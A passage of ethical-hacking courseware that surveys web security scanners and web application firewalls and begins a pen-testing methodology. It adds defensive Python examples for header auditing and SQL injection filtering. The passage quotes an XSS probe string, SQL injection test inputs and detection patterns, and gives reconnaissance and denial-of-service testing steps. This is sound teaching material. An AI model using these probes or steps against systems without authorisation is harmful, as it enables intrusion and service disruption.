[Screenshot: the Watcher tab inside Fiddler showing its list of enabled checks, including header checks (Cache-Control set on sensitive responses, Content-Type present, the IE XSS protection header enabled, X-Content-Type-Options set to prevent MIME sniffing, X-Frame-Options set to defend against clickjacking), information disclosure checks (database error messages, debug comments that warrant further attention, sensitive information in HTTP responses and in URL parameters), each mapped to an OWASP ASVS item, with a configurable list of common debug messages such as PHP warnings and errors, and the "Export Results" and HTML report options. Watcher Web Security Tool v1.3.0, Copyright 2010 Casaba Security, LLC.]
Web Application Security Tool: Watcher Web Security Tool
Source: http://www.casaba.com
Watcher is a plugin for the Fiddler HTTP proxy that passively audits a web application to find security bugs and compliance issues automatically. Passive detection means it only inspects the traffic that normal browsing already generates and sends no requests of its own, so it's safe for production use. It detects web-application security issues and operational configuration issues.
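The passive audit described above, written out as an added example (not Casaba's code): it reads captured responses and request URLs, never sends a request, and reports the kinds of findings the Watcher check list names (Cache-Control, Content-Type, X-XSS-Protection, X-Content-Type-Options, X-Frame-Options, sensitive data in URL parameters). The sample captures and the list of sensitive parameter names are constructed for this example.

```python
"""Passive HTTP response audit in the spirit of the Watcher checks.

Added example, not Casaba's code: it only reads responses that were
already captured (here, constructed samples) and never sends requests.
"""
from typing import Dict, List
from urllib.parse import parse_qsl, urlsplit

# Parameter names treated as sensitive when they appear in a URL (this
# example's own list; Watcher's actual list is not on the page).
SENSITIVE_PARAM_NAMES = {"password", "passwd", "pwd", "token", "sessionid",
                         "session", "ssn", "creditcard"}

# Constructed sample captures: (label, request URL, response headers).
SAMPLE_CAPTURES = [
    ("hardened page",
     "https://app.example.test/account?tab=profile",
     {"Content-Type": "text/html; charset=utf-8",
      "Cache-Control": "no-store, no-cache, must-revalidate",
      "X-Content-Type-Options": "nosniff",
      "X-Frame-Options": "DENY",
      "X-XSS-Protection": "1; mode=block"}),
    ("weak page",
     "https://app.example.test/login?user=alice&password=hunter2",
     {"Content-Type": "text/html",
      "Cache-Control": "public, max-age=3600"}),
]


def audit_headers(headers: Dict[str, str]) -> List[str]:
    """Return findings for one response's headers (names compared case-insensitively)."""
    h = {name.lower(): value for name, value in headers.items()}
    findings: List[str] = []

    content_type = h.get("content-type")
    if content_type is None:
        findings.append("Content-Type header missing")
    elif content_type.lower().startswith("text/") and "charset=" not in content_type.lower():
        findings.append("Content-Type lacks a charset")

    if "no-store" not in h.get("cache-control", "").lower():
        findings.append("Cache-Control does not set no-store")

    if h.get("x-content-type-options", "").strip().lower() != "nosniff":
        findings.append("X-Content-Type-Options nosniff not set (MIME sniffing)")

    if "x-frame-options" not in h:
        findings.append("X-Frame-Options not set (clickjacking)")

    if "x-xss-protection" not in h:
        findings.append("X-XSS-Protection not set (IE XSS filter)")

    return findings


def audit_url(url: str) -> List[str]:
    """Flag sensitive-looking parameter names passed in the query string."""
    query = urlsplit(url).query
    return [f"sensitive parameter '{name}' passed in URL"
            for name, _ in parse_qsl(query, keep_blank_values=True)
            if name.lower() in SENSITIVE_PARAM_NAMES]


def audit_capture(url: str, headers: Dict[str, str]) -> List[str]:
    """Combine the URL and header checks for one captured exchange."""
    return audit_url(url) + audit_headers(headers)


def audit_all(captures=SAMPLE_CAPTURES) -> Dict[str, List[str]]:
    """Audit every captured exchange; returns label -> findings."""
    return {label: audit_capture(url, headers) for label, url, headers in captures}


if __name__ == "__main__":
    for label, findings in audit_all().items():
        print(f"{label}: {findings or ['no findings']}")
```

Run stand-alone it prints no findings for the hardened page and six for the weak one; in a proxy plugin the same functions would be fed each captured session instead of the constructed list.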
FIGURE 13.63: Watcher Web Security Tool Screenshot
Web Application Security Scanner: Netsparker
- Netsparker performs automated comprehensive web application scanning for vulnerabilities such as SQL injection, cross-site scripting, remote code injection, etc.
- It delivers detection, confirmation, and exploitation of vulnerabilities in a single integrated environment
[Slide screenshot: a Netsparker Cross-site Scripting finding showing the URL, parameter name, parameter type, attack pattern, vulnerability details and classification; http://www.mavitunasecurity.com]
Web Application Security Scanner: Netsparker
Source: http://www.mavitunasecurity.com
Netsparker® can find and report on security vulnerabilities such as SQL injection and cross-site scripting (XSS) in all web applications, regardless of the platform and the technology they are built on. It allows you to resolve security problems before they are exploited by unknown attackers.
[Figure 13.64 screenshot residue: Netsparker 2.0.0.0 (Mavituna Security Limited, 1 Seat) scanning test37.netsparker.com:8081. Panels: Browser View, HTTP Request / Response, Vulnerability, Controlled Scan, Retest. CONFIRMED Cross-site Scripting at http://test37.netsparker.com:8081/dilemma/xsstb/reflected/32.php, parameter name "param", parameter type Querystring, attack pattern <script>alert(0x000016)</script>. Classification: PCI 2.0 6.5.7, PCI 1.2 6.5.1, OWASP A2. Vulnerability details: "XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the ..." (text truncated in the screenshot). Issues grouped by Vulnerability Type / Severity: Cross-site Scripting (1), Apache Version Disclosure, PHP Version Disclosure, Apache Version Is Out Of Date. Site tree: test37.netsparker.com:8081 / dilemma / xsstb / reflected / 32.php / ?param. Scan Information: Current Speed 2.6 req/sec, Average Speed 3.7 req/sec, Total Requests 37, Failed Requests 0, HEAD Requests 0, Elapsed Time 00:00:10. Status: Proxy: System [None]; Scan and Confirmation finished.]
FIGURE 13.64: Netsparker Tool Screenshot
Web Application Security Tool: N-Stalker Web Application Security Scanner
[Slide screenshot: N-Stalker Web Application Security Scanner 2012 - Free Edition, scan summary by severity (High, Mid, Low); http://nstalker.com]
- N-Stalker Web Application Security Scanner is an effective suite of web security assessment checks to enhance the overall security of web applications against a wide range of vulnerabilities and sophisticated hacker attacks
- It contains all web security assessment checks such as:
  - Code injection
  - Cross-Site scripting
  - Parameter tampering
  - Web server vulnerabilities
Web Application Security Tool: N-Stalker Web Application Security Scanner
Source: http://nstalker.com
N-Stalker Web Application Security Scanner provides an effective suite of web security assessment checks to enhance the overall security of your web applications against a wide range of vulnerabilities and sophisticated hacker attacks. It also allows you to create your own assessment policies and requirements, enabling an effective way to manage your application's SDLC, including the ability to control information exposure, development flaws, infrastructure issues, and real security vulnerabilities that can be explored by external agents. It contains all web security assessment checks such as code injection, cross-site scripting, parameter tampering, web server vulnerabilities, etc.
[Figure 13.65 screenshot residue: N-Stalker Web Application Security Scanner 2012 - Free Edition. Toolbar: Start Scan, Threads, Engine & Crawler Settings, Encode URL, Error Filter, Control Options, Start Proxy, URL Restriction Settings, Session Control, Threads Control, Spider Control, False-Positive Control, Timeout 15, Default HTTP. Results by severity: High (0), Mid (9), Low (1), Info (2). Network: Bytes Sent 901,526; Bytes Received 2,029,110; Avg Response Time 3525 ms; Avg Transfer Rate 1,752.88 kb/s; Requests/Minute 731.00 req/min. Scan Session: Start Time (Dec 2012, partly illegible). Spider Engine: Crawled URLs 15, Crawled Hosts 1, Default Page Size 56,117 bytes. Scan Engine: Total Requests 2926, Failed Requests 0, Attacks Sent 315, 404 Errors 2617, 302 Redirection 0. Scanner tree: Dashboard, Site Sequence, Allowed Hosts, Rejected Hosts, Objects, Cookies, Scripts (11), Comments (11), Web Forms (5), E-mails, Broken pages (1), Hidden Fields, Information Leakage (1), Vulnerabilities, http://10.0.0.2/. Status: N-Stalker Scanner session is being closed... [Dashboard Thread]]
FIGURE 13.65: N-Stalker Web Application Security Scanner Tool Screenshot
Web Application Security Tool: VampireScan
- VampireScan allows users to test their own Cloud and Web applications for basic attacks and receive actionable results all within their own Web portal
VampireScan Features
- Protect your website from hackers
- Scan and protect your infrastructure and web applications from cyber-threats
- Give you direct, actionable insight on high, medium, and low risk vulnerabilities
http://www.vampiretech.com
Web Application Security Tool: VampireScan
Source: http://www.vampiretech.com
VampireScan allows users to test their own Cloud and Web applications for basic attacks and receive actionable results all within their own Web portal. It can protect your website from hackers. This tool can scan and protect your infrastructure and web applications from cyber-threats and can also give you direct, actionable insight on high, medium, and low risk vulnerabilities.
[Figure 13.66 screenshot residue: VampireScan web portal dashboard. Summary / Statistics: Queued Scans 0, Scans In Progress 0, Account Balance $0.00, Unused Services, Expiring Unused Services 0. Security Grades: A, B, C, D, F. Recent Activity table with columns Status, Web Site URL, Description, Scanner, Latest Results, Grade, HARM, Vuln. (High/Medium/Low) and Previous Scans; rows show scans dated 3/28/2012, 3/27/2012, 3/24/2012, 3/13/2012 and 12/15/2011 with vulnerability counts such as 6/2/0, 193/214/271, 124/148/113, 12/1/0 and 44/42/65. Paging control: Show 5 10 20 50 100 200.]
FIGURE 13.66: VampireScan Tool Screenshot
Web Application Security Tools
- Websecurify: http://www.websecurify.com
- X5s: http://www.casaba.com
- Ratproxy: http://code.google.com
- NetBrute: http://www.rawlogic.com
- WSSA - Web Site Security Scanning Service: https://secure.beyondsecurity.com
- Sandcat Mini: http://www.syhunt.com
- SecuBat Vulnerability Scanner: http://secubat.codeplex.com
- SPIKE Proxy: http://www.immunitysec.com
- OWASP ZAP: http://www.owasp.org
- skipfish: http://code.google.com
Web Application Security Tools
Web application security tools are web application security assessment software designed to thoroughly analyze today's complex web applications with the aim of finding exploitable SQL injection, XSS vulnerabilities, etc. These tools deliver scanning capabilities, broad assessment coverage, and accurate web application scanning results. Commonly used web application security tools are listed as follows:
- Sandcat Mini available at http://www.syhunt.com
- OWASP ZAP available at http://www.owasp.org
- skipfish available at http://code.google.com
- SecuBat Vulnerability Scanner available at http://secubat.codeplex.com
- SPIKE Proxy available at http://www.immunitysec.com
- Websecurify available at http://www.websecurify.com
- NetBrute available at http://www.rawlogic.com
- X5s available at http://www.casaba.com
- WSSA - Web Site Security Scanning Service available at https://secure.beyondsecurity.com
- Ratproxy available at http://code.google.com
Web Application Security Tools (Cont'd)
- Syhunt Hybrid: http://www.syhunt.com
- Exploit-Me: http://labs.securitycompass.com
- WSDigger: http://www.mcafee.com
- Wapiti: http://wapiti.sourceforge.net
- WebWatchBot: http://www.exclamationsoft.com
- KeepNI: http://www.keepni.com
- Grabber: http://rgaucher.info
- Arachni: http://arachni-scanner.com
- Vega: http://www.subgraph.com
- xsss: http://www.sven.de
Web Application Security Tools (Cont'd)
In addition to the previously mentioned web application security tools, there are a few more tools that can be used to assess the security of web applications:
- Wapiti available at http://wapiti.sourceforge.net
- WebWatchBot available at http://www.exclamationsoft.com
- KeepNI available at http://www.keepni.com
- Grabber available at http://rgaucher.info
- XSSS available at http://www.sven.de
- Syhunt Hybrid available at http://www.syhunt.com
- Exploit-Me available at http://labs.securitycompass.com
- WSDigger available at http://www.mcafee.com
- Arachni available at http://arachni-scanner.com
- Vega available at http://www.subgraph.com
Web Application Firewall: dotDefender
[Slide screenshot: dotDefender SQL Injection pattern settings (Suspect Single Quote (Safe), Pattern = Pattern, Classic SQL Comment, SQL Comments, 'Union Select' Statement, 'Select Version' Statement, SQL CHAR Type, SQL SYS Commands, IS_SRVROLEMEMBER followed by (, MS SQL Specific SQL Injection) and the security profile tree (Server Masking, Upload Folders, Patterns, Whitelist, Encoding, Buffer Overflow, SQL Injection, ...); license status "dotDefender (329 days left)"]
- dotDefender is a software based Web Application Firewall
- It complements the network firewall, IPS and other network-based Internet security products
- It inspects the HTTP/HTTPS traffic for suspicious behavior
- It detects and blocks SQL injection attacks
http://www.applicure.com
Web Application Firewall: dotDefender
Source: http://www.applicure.com
dotDefender™ is a software-based web application firewall that provides additional website security against malicious attacks and website defacement. Web application attacks such as SQL injection, path traversal, cross-site scripting, and other attacks leading to website defacement can be prevented with dotDefender. It complements the network firewall, IPS, and other network-based Internet security products. It inspects HTTP/HTTPS traffic for suspicious behavior.
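To make concrete what a pattern-based WAF such as dotDefender is matching when it "inspects HTTP traffic for suspicious behavior", here is an added example (not Applicure's code) that classifies decoded request parameters against the SQL injection categories listed in the dotDefender profile above. The regular expressions, the allow/log/block policy and the reading of the "(Safe)" label on the single-quote category as "log only unless combined with other hits" are this example's own assumptions, and the sample query strings are constructed.

```python
"""Request-parameter inspection modelled on the SQL Injection pattern
categories in the dotDefender profile (Suspect Single Quote, Pattern =
Pattern, Classic SQL Comment, SQL Comments, 'Union Select', 'Select
Version', SQL CHAR Type, SQL SYS Commands, IS_SRVROLEMEMBER).

Added example, not Applicure's code: the regular expressions and the
allow/log/block policy are this example's own approximations.
"""
import re
from typing import Dict, List, Tuple
from urllib.parse import parse_qsl

# One regex per category from the dotDefender screen; illustrative
# approximations, not the product's signatures.
SQLI_PATTERNS: List[Tuple[str, re.Pattern]] = [
    ("Suspect Single Quote", re.compile(r"'")),
    # Tautology such as 1=1 or 'a'='a': the same token on both sides of "="
    ("Pattern = Pattern", re.compile(r"(\w+|'[^']*')\s*=\s*\1")),
    ("Classic SQL Comment", re.compile(r"--")),
    ("SQL Comments", re.compile(r"/\*.*?\*/", re.S)),
    ("'Union Select' Statement", re.compile(r"\bunion\b.*?\bselect\b", re.I | re.S)),
    ("'Select Version' Statement",
     re.compile(r"\bselect\b.*?(@@version|\bversion\s*\()", re.I | re.S)),
    ("SQL CHAR Type", re.compile(r"\bchar\s*\(\s*\d+", re.I)),
    ("SQL SYS Commands",
     re.compile(r"\bsys(objects|columns|databases|users)\b|\b(xp|sp)_\w+", re.I)),
    ("IS_SRVROLEMEMBER followed by (", re.compile(r"\bis_srvrolemember\s*\(", re.I)),
]

# A lone quote is common in legitimate input (names like O'Brien); this is
# how the example reads the "(Safe)" label on that category: on its own it
# is only logged, and it contributes to a block only alongside other hits.
LOG_ONLY = {"Suspect Single Quote"}


def classify(value: str) -> List[str]:
    """Names of the pattern categories that match a decoded parameter value."""
    return [name for name, pattern in SQLI_PATTERNS if pattern.search(value)]


def inspect_param(value: str) -> Tuple[str, List[str]]:
    """Return (decision, matched categories); decision is allow, log or block."""
    matches = classify(value)
    if not matches:
        return "allow", matches
    if set(matches) <= LOG_ONLY:
        return "log", matches
    return "block", matches


def inspect_query(query_string: str) -> Dict[str, Tuple[str, List[str]]]:
    """Decode a URL query string and inspect every parameter value."""
    return {name: inspect_param(value)
            for name, value in parse_qsl(query_string, keep_blank_values=True)}


if __name__ == "__main__":
    # Constructed sample query strings, not captured traffic.
    for q in ("id=42&name=O%27Brien",
              "id=1%27+OR+1%3D1+--",
              "q=x%27+UNION+SELECT+%40%40version+--",
              "q=select+name+from+sysobjects"):
        print(q, "->", inspect_query(q))
```

The decoding step matters: the WAF must match on the same representation the application will see (URL-decoded here), otherwise percent-encoded input slips past the patterns. The log-only tier is the usual trade-off between blocking apostrophes in names and catching `' OR 1=1 --`, which is why the product separates the quote check from the rest.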
[Figure 13.67 screenshot residue: dotDefender administration console. SQL Injection pane, "Choose which type of SQL Injection attacks to intercept": Suspect Single Quote (Safe), Pattern = Pattern, Classic SQL Comment, SQL Comments, 'Union Select' Statement, 'Select Version' Statement, SQL CHAR Type, SQL SYS Commands, IS_SRVROLEMEMBER followed by (, MS SQL Specific SQL Injection (all checked). Menu: File, Action, View, Favorites, Window, Help. Tree: dotDefender (329 days left); Event Viewer (local); Internet Information Services; License; Global Settings; Default Security Profile (Protect): Server Masking, Upload Folders, Patterns (Whitelist (Permitted Access), Paranoid, Encoding, Buffer Overflow, SQL Injection (User Defined, Best Practices), Cross-Site Scripting, Cookie Manipulation, Path Traversal, Probing, Remote Command Execution, Code Injection, Windows Directories and Files, XML Schema, XPath Injection, XPath Cross-Site Scripting, Signatures); (Use Default); Athena HT Site (Use Default).]
FIGURE 13.67: dotDefender
Web Application Firewall: ServerDefender VP
- ServerDefender VP Web application firewall is designed to provide security against web attacks
[Slide screenshot: ServerDefender VP Settings Manager, Input Validation tab with Common Threats (SQL Injection, Cross-Site Scripting (XSS)) and Generic Input Sanitization levels None / Minimum / Extended / Paranoid]
http://www.port80software.com
Web Application Firewall: ServerDefender VP
Source: http://www.port80software.com
The ServerDefender VP web application firewall is designed to provide security against web attacks. SDVP security will prevent data theft and breaches and stop unauthorized site defacement, file alterations, and deletions.
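The "Generic Input Sanitization" levels on the ServerDefender VP Input Validation tab (Figure 13.68) are a byte-class filter with a "Deny and Log" action, and this added example (not Port80 Software's code) shows how such a filter behaves at each level. The Minimum byte ranges and the Extended characters are read from the figure; for Paranoid only the `|` character is legible there, so that set is an assumption of this example, as are the sample form submissions.

```python
"""Generic input sanitization levels as shown on the ServerDefender VP
Input Validation tab: None, Minimum, Extended, Paranoid, with the action
"Deny and Log".

Added example, not Port80 Software's code. Minimum and Extended are read
from the figure; for Paranoid only '|' is legible, so that set is assumed.
"""
import logging
from enum import IntEnum
from typing import Dict, List, Tuple

logging.basicConfig(level=logging.INFO, format="%(levelname)s %(message)s")
log = logging.getLogger("sdvp-example")


class Level(IntEnum):
    NONE = 0
    MINIMUM = 1
    EXTENDED = 2
    PARANOID = 3


# Minimum: [0-9, 11, 12, 14-31, 127, 175-223, 255] from the figure.
# LF (10) and CR (13) are exempt, while TAB (9) is not.
MINIMUM_BYTES = frozenset(
    list(range(0, 10)) + [11, 12] + list(range(14, 32)) + [127]
    + list(range(175, 224)) + [255]
)
# Extended: [>, <, '] + Minimum (from the figure).
EXTENDED_BYTES = MINIMUM_BYTES | frozenset(b"><'")
# Paranoid: [|, ...] + Extended; only '|' is legible, so only '|' is added here.
PARANOID_BYTES = EXTENDED_BYTES | frozenset(b"|")

FORBIDDEN: Dict[Level, frozenset] = {
    Level.NONE: frozenset(),
    Level.MINIMUM: MINIMUM_BYTES,
    Level.EXTENDED: EXTENDED_BYTES,
    Level.PARANOID: PARANOID_BYTES,
}


def offending_bytes(value: bytes, level: Level) -> List[Tuple[int, int]]:
    """(offset, byte) pairs in a raw parameter value that the level forbids."""
    forbidden = FORBIDDEN[level]
    return [(i, b) for i, b in enumerate(value) if b in forbidden]


def check_request(params: Dict[str, bytes], level: Level) -> Dict[str, object]:
    """Apply the "Deny and Log" action: deny the whole request if any value offends."""
    findings = {name: offending_bytes(value, level) for name, value in params.items()}
    findings = {name: hits for name, hits in findings.items() if hits}
    decision = "deny" if findings else "allow"
    for name, hits in findings.items():
        log.info("denied: parameter %r contains %s at level %s",
                 name, [f"0x{b:02x}@{i}" for i, b in hits], level.name)
    return {"decision": decision, "findings": findings}


if __name__ == "__main__":
    # Constructed sample form submissions, not captured traffic.
    samples = [
        {"user": b"alice", "comment": b"line1\r\nline2"},
        {"user": b"O'Brien", "comment": b"hello"},
        {"user": b"bob", "comment": b"<b>bold</b>"},
        {"user": b"bob", "comment": b"a|b"},
    ]
    for level in Level:
        for params in samples:
            print(level.name, params, "->", check_request(params, level)["decision"])
```

Running it shows the practical cost of each step: Minimum rejects control bytes (including tab) and high bytes but accepts apostrophes, Extended starts rejecting names such as O'Brien and any HTML-like input, and Paranoid adds the pipe, so the level has to be chosen per site against what its forms legitimately accept.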
[Figure 13.68 screenshot residue: ServerDefender VP Settings Manager (port80). Protection for Default Web Site is ON (OFF / LOG ONLY / ON). Sections: Site Status, Request Mgmt, Response Mgmt, Session Mgmt, Error Mgmt, Admin Options. Tabs: Input Validation, Buffer Overflow, Resources, Methods, URLs, File Uploads, Exceptions. Generic Input Sanitization: None; Minimum [0-9, 11, 12, 14-31, 127, 175-223, 255]; Extended [>, <, '] + Minimum; Paranoid [|, ...] + Extended. Sanitization Action: Deny and Log. Enforcement Level 1 2 3 4 5. Site Status tabs: Blocked IPs, Alerting, Reporting. ServerDefender VP Statistics Since 11/8/2011: Total HTTP Requests 26719, Total Sessions Created 752, Currently Active Sessions 750, Total Blocked IPs 0, Currently Blocked IPs 0, Total Error Count 723. Error Statistics columns: Site, Total, 404, SQL, XSS, Input, Cookie, Other. Tree: Default Profile, Default Web Site (Custom), Gauntlet, Administration, Assets; buttons OK, Cancel, Apply, Expert View.]
FIGURE 13.68: ServerDefender VP
Web Application Firewalls
- Barracuda Web Application Firewall: https://www.barracudanetworks.com
- Radware's AppWall: http://www.radware.com
- ThreatSentry: http://www.privacyware.com
- Stingray Application Firewall: http://www.riverbed.com
- IBM Security AppScan: http://www-01.ibm.com
- QualysGuard WAF: http://www.qualys.com
- Trustwave WebDefend: https://www.trustwave.com
- Cyberoam's Web Application Firewall: http://www.cyberoam.com
- ThreatRadar: http://www.imperva.com
- ModSecurity: http://www.modsecurity.org
Web Application Firewalls
Web application firewalls secure websites, web applications, and web services against known and unknown attacks. They prevent data theft and manipulation of sensitive corporate and customer information. Commonly used web application firewalls are listed as follows:
- Radware's AppWall available at http://www.radware.com
- ThreatSentry available at http://www.privacyware.com
- QualysGuard WAF available at http://www.qualys.com
- ThreatRadar available at http://www.imperva.com
- ModSecurity available at http://www.modsecurity.org
- Barracuda Web Application Firewall available at https://www.barracudanetworks.com
- Stingray Application Firewall available at http://www.riverbed.com
- IBM Security AppScan available at http://www-01.ibm.com
- Trustwave WebDefend available at https://www.trustwave.com
- Cyberoam's Web Application Firewall available at http://www.cyberoam.com
Module Flow
[Slide diagram: Web App Concepts, Web App Threats, Security Tools, Countermeasures]
Module Flow
As mentioned previously, web applications are more vulnerable to attacks. Attackers use web applications as the sources for spreading attacks by turning them into malicious applications once compromised. Your web application may also become a victim of such attacks. Therefore, to avoid this situation, you should conduct penetration testing in order to determine the vulnerabilities before they are exploited by real attackers.
[Module flow diagram: Web App Concepts, Web App Threats, Hacking Methodology, Web Application Hacking Tools, Countermeasures, Security Tools, Web App Pen Testing]
Web applications can be compromised in many ways. This section describes how to conduct web application pen testing against all possible kinds of attacks.
Web Application Pen Testing
- Web application pen testing is used to identify, analyze, and report vulnerabilities such as input validation, buffer overflow, SQL injection, bypassing authentication, code execution, etc. in a given application
- The best way to perform penetration testing is to conduct a series of methodical and repeatable tests, and to work through all of the different application vulnerabilities
Identification of Ports: Scan the ports to identify the associated running services and analyze them through automated or manual tests to find weaknesses
Verification of Vulnerabilities: To exploit the vulnerability in order to test and fix the issue
Remediation of Vulnerabilities: To retest the solution against vulnerability to ensure that it is completely secure
Web Application Pen Testing
Web application pen testing is done to detect various security vulnerabilities and associated risks. As a pen tester, you should test your web application for vulnerabilities such as input validation, buffer overflow, SQL injection, bypassing authentication, code execution, etc. The best way to carry out a penetration test is to conduct a series of methodical and repeatable tests, and to work through all of the different application vulnerabilities.
Web application pen testing helps in:
- Identification of Ports: Scan the ports to identify the associated running services and analyze them through automated or manual tests to find weaknesses.
- Verification of Vulnerabilities: To exploit the vulnerability in order to test and fix the issue.
- Remediation of Vulnerabilities: To retest the solution against vulnerability to ensure that it is completely secure.
[Slide: Web Application Pen Testing (Cont'd). Flow diagram: START → Information Gathering → Configuration Management Testing → Authentication Testing → Session Management Testing → Denial-of-Service Testing → Data Validation Testing → Business Logic Testing → Authorization Testing → AJAX Testing → Web Services Testing]
Web Application Pen Testing (Cont'd)
The general steps that you need to follow to conduct a web application penetration test are listed here. In a later section, each step is explained in detail.
Step 1: Defining the objective
Define the aim of the penetration test before conducting it. This keeps the test moving in the right direction towards that aim.
Step 2: Information gathering
Gather as much information as possible about your target system or network.
Step 3: Configuration management testing
Most web application attacks occur because of improper configuration. Therefore, you should conduct configuration management testing. This also helps you protect against known vulnerabilities by installing the latest updates.
Step 4: Authentication testing
Test the authentication session to understand the authentication mechanism and to determine the possible exploits in it.
Step 5: Session management testing
Perform session management testing to check your web application against attacks that are based on the session ID, such as session hijacking, session fixation, etc.
Step 6: Denial-of-service testing
Send a vast number of requests to the web application until the server gets saturated, and analyze the behavior of the application while the server is saturated. In this way you can test your web application against denial-of-service attacks.
Step 7: Data validation testing
Failing to adopt a proper data validation method is the common security weakness observed in most web applications. This may further lead to major vulnerabilities in web applications. Hence, before a hacker finds those vulnerabilities and exploits your application, perform data validation testing and protect your web application.
Step 8: Business logic testing
Web application security flaws may be present even in the business logic. Hence, you should test the business logic for flaws. By exploiting the business logic, attackers may do something that the business does not allow, which may sometimes lead to great financial loss. Testing business logic for security flaws requires unconventional thinking.
Step 9: Authorization testing
Analyze how the web application authorizes the user and then try to find and exploit the vulnerabilities present in the authorization mechanism.
Step 10: Web services testing
Web services use the HTTP protocol in conjunction with XML, WSDL, SOAP, and UDDI technologies. Therefore, web services have XML/parser related vulnerabilities in addition to SQL injection, information disclosure, etc. You should conduct web services testing to determine the vulnerabilities of web-based services.
Step 11: AJAX testing
Though more responsive web applications are developed using AJAX, they are likely as vulnerable as a traditional web application. Testing AJAX is challenging because web application developers are given full freedom to design the way the client and server communicate.
Step 12: Document all the findings
Once you have conducted all the tests mentioned here, document all the findings and the testing techniques employed at each step. Analyze the document, explain the current security posture to the concerned parties, and suggest how they can enhance their security.
[Slide: Information Gathering. Flow: START → Analyze the robots.txt file (allowed and disallowed directories) → Perform search engine reconnaissance (issues of web application structure, error pages produced) → Identify application entry points (cookie information, 300 and 400 HTTP status codes, 500 internal server errors) → Identify the web applications (web applications, old versions of files or artifacts) → Analyze the output from HEAD and OPTIONS HTTP requests (web server software version, scripting environment, and OS in use)]
Information Gathering
Let's get into detail and discuss each web application test step thoroughly.
The first step in web application pen testing is information gathering. To gather all the information about the target application, follow these steps:
Step 1: Analyze the robots.txt file
robots.txt is a file that instructs web robots about the website, such as which directories crawlers are allowed or disallowed to visit. Hence, analyze robots.txt and determine the allowed and disallowed directories of a web application. You can retrieve and analyze the robots.txt file using tools such as GNU Wget.
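As an added example (not code from the module), here is a small Python parser for the robots.txt format that lists the Disallow entries a site publishes and flags those that name admin, backup or internal areas; the sample file, host name and paths are constructed.

```python
"""Parse a robots.txt file and list what it discloses about a site's layout.

Added example for the robots.txt analysis step (not code from the module);
the sample file below is constructed for illustration, not fetched from a
real site. The parser follows the common 'field: value' record syntax.
"""

# Constructed sample: what a tester would see after fetching /robots.txt
# with a tool such as GNU Wget. Host name and paths are made up.
SAMPLE_ROBOTS_TXT = """\
# robots.txt for example.test (constructed sample)
User-agent: *
Disallow: /admin/
Disallow: /backup/
Disallow: /cgi-bin/
Allow: /public/
Crawl-delay: 10

User-agent: Googlebot
Disallow: /internal-reports/
Sitemap: https://example.test/sitemap.xml
"""

# Words in a disallowed path that suggest admin, backup or internal content.
SENSITIVE_HINTS = ("admin", "backup", ".bak", "cgi-bin", "internal",
                   "private", "config")


def parse_robots(text):
    """Return {"agents": {agent: {"allow": [...], "disallow": [...]}},
               "sitemaps": [...]}.

    Rules: '#' starts a comment; field names are case-insensitive; a record
    is one or more User-agent lines followed by Allow/Disallow lines, and a
    blank line (or a User-agent line after rules) ends the record.
    """
    agents = {}
    sitemaps = []
    current_agents = []
    reading_agents = True   # True while collecting User-agent lines of a record
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            current_agents = []
            reading_agents = True
            continue
        if ":" not in line:
            continue                  # not a directive; ignore silently
        field, value = (part.strip() for part in line.split(":", 1))
        field = field.lower()
        if field == "sitemap":
            sitemaps.append(value)
        elif field == "user-agent":
            if not reading_agents:    # rules already seen: a new record starts
                current_agents = []
                reading_agents = True
            current_agents.append(value)
            agents.setdefault(value, {"allow": [], "disallow": []})
        elif field in ("allow", "disallow"):
            reading_agents = False
            if value:                 # "Disallow:" with no value disallows nothing
                for agent in current_agents:
                    agents[agent][field].append(value)
    return {"agents": agents, "sitemaps": sitemaps}


def disclosed_paths(parsed):
    """All paths the file asks crawlers to avoid, de-duplicated and sorted.

    Disallow is a politeness hint for crawlers, not an access control, so
    everything listed here is visible to anyone who reads the file; each
    such location must be protected by authentication or removed.
    """
    paths = set()
    for rule_set in parsed["agents"].values():
        paths.update(rule_set["disallow"])
    return sorted(paths)


def sensitive_disclosures(parsed):
    """Disallowed paths whose names suggest admin, backup or internal content."""
    return [p for p in disclosed_paths(parsed)
            if any(hint in p.lower() for hint in SENSITIVE_HINTS)]


if __name__ == "__main__":
    parsed = parse_robots(SAMPLE_ROBOTS_TXT)
    for agent, rule_set in parsed["agents"].items():
        print(agent, "disallow:", rule_set["disallow"], "allow:", rule_set["allow"])
    print("sitemaps:", parsed["sitemaps"])
    print("worth reviewing:", sensitive_disclosures(parsed))
```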
Step 2: Perform search engine reconnaissance
Use the advanced "site:" search operator and then click Cached to perform search engine reconnaissance. It gives you information such as issues of web application structure and the error pages produced.
Step 3: Identify application entry points
Identify application entry points using tools such as WebScarab, Burp Proxy, OWASP ZAP, TamperIE (for Internet Explorer), or Tamper Data (for Firefox). Cookie information, 300 and 400 HTTP status codes, and 500 internal server errors may give clues about the entry points of the target web application.
Step 4: Identify the web applications
To identify web applications: probe for URLs, do dictionary-style searching (intelligent guessing), and perform vulnerability scanning using tools such as Nmap (port scanner) and Nessus. Check for web applications, old versions of files, or artifacts. Sometimes old versions of files give useful information that attackers can use to launch attacks on the web application.
Step 5: Analyze the output from HEAD and OPTIONS HTTP requests
Implement techniques such as DNS zone transfers, DNS inverse queries, web-based DNS searches, and querying search engines (Googling). This may reveal information such as the web server software version, scripting environment, and OS in use.
[Slide: Information Gathering (Cont'd). Flow: Analysis of error codes (software versions, details of databases, bugs, and technological components) → Test for recognized file types/extensions/directories (web application environment) → Examine source of available pages (clues as to the underlying application environment) → TCP/ICMP and service fingerprinting (web application services and associated ports)]
Information Gathering (Cont'd)
Step 6: Analyze error codes
Analyze error codes by requesting invalid pages and utilize alternate request methods (POST/PUT/other) in order to collect confidential information from the server. This may reveal information such as software versions, details of databases, bugs, and technological components.
Step 7: Test for recognized file types/extensions/directories
Test for recognized file types, extensions, and directories by requesting common file extensions such as .ASP, .HTM, .PHP, and .EXE, and observe the response. This may give you an idea about the web application environment.
Step 8: Examine the source of available pages
Examine the source code of the accessible pages of the application front end. This provides clues about the underlying application environment.
Step 9: TCP/ICMP and service fingerprinting
Perform TCP/ICMP and service fingerprinting using traditional fingerprinting tools such as Nmap and Queso, or the more recent application fingerprinting tool Amap. This gives you information about web application services and associated ports.
